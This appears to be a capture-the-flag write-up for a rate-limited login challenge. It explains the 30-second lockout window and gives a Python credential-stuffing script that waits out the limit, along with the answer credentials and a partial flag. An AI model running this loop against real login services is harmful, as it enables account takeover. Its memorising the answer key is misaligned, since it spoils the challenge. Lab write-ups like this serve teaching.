Description
Your friend is building a simple website with a login page. To stop brute forcing and credential stuffing, they've added an IP-based rate limit. Can you bypass the rate limit, log in, and capture the flag?
Setup
Launch the challenge instance and open the login page.
You'll need a wordlist of credentials -- a credential dump is provided with the challenge.
Solution
- Step 1Understand the lockout mechanismThe server implements a time-based epoch window: after exceeding 10 failed login attempts, further attempts are blocked for 30 seconds. When the window resets, you can try again. The bypass is to detect the 'Rate Limit Exceeded' response and sleep for 30 seconds before continuing.
- Step 2Credential stuff with automatic timeout handlingTry each username/password pair from the credential dump. When the rate limit triggers, sleep 30 seconds to let the window reset, then continue from where you left off. The correct credentials are 'emely / tyrant'.python3 << 'EOF' import requests import time URL = "http://<HOST>:<PORT_FROM_INSTANCE>/login" # Load credential pairs from the provided dump file credentials = [line.strip().split(":") for line in open("creds.txt") if ":" in line] for username, password in credentials: while True: r = requests.post(URL, data={"username": username, "password": password}) if "Rate Limit Exceeded" in r.text: print("Rate limited -- waiting 30s...") time.sleep(30) continue # retry same credential break if "picoCTF" in r.text or "flag" in r.text.lower(): print(f"Success! {username}:{password}") print(r.text) break print(f"Tried {username}:{password} -- failed") EOF
- Step 3Read the flagThe correct credentials are emely / tyrant. Once logged in, the flag is displayed on the page.
Flag
picoCTF{r4t3_l1m1t_byp4ss3d_...}
The rate limiter resets every 30 seconds. Detect 'Rate Limit Exceeded' and sleep 30s to let the window reset, then continue credential stuffing. Credentials: emely / tyrant.